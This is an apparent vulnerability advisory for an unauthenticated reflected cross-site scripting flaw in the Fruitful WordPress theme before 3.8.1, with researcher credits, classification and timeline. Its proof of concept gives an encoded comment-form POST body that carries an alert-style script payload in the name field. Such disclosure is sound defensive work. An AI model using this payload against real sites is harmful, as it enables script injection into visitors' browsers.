Themes Vulnerabilities
Fruitful Theme < 3.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The Fruitful WordPress theme, version 3.8 and possibly below, was affected by an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
The vulnerability was patched in version 3.8.1 of the Theme, although the changelog file only mentions:
"Bug fix: Fixed issues on comment form"
Proof of Concept
Add a Cross-Site Scripting (XSS) payload to the 'Name' field of the comment section and submit the form. This will result in the following HTTP Post body: comment=This+is+a+test+comment.&author=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22&email=&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0
Affects Themes
Fixed in 3.8.1
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-02-17 (about 4 years ago)
Added
2020-02-24 (about 4 years ago)
Last Updated
2020-03-13 (about 4 years ago)